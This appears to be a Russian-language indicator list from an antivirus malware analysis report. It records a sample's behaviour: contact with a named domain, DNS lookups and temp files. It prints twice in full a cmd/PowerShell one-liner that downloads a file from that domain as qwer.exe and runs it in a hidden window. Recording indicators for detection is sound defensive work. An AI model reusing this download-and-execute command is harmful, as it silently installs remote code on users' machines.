Техническая информация
- http://mybabystork.com/system/helper/json/fcbk.mdk как %temp%\qwer.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://mybabystork.com/system/helper/json/fcbk.mdk','%TMP%\qwer.exe');Start-Process '%TMP%\qwer.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\1162145.cvr
- 'my###ystork.com':80
- http://my###ystork.com/system/helper/json/fcbk.mdk
- DNS ASK my###ystork.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://mybabystork.com/system/helper/json/fcbk.mdk','%TMP%\qwer.exe');Start-Process '%TMP%\qwer.exe';' (со скрытым окном)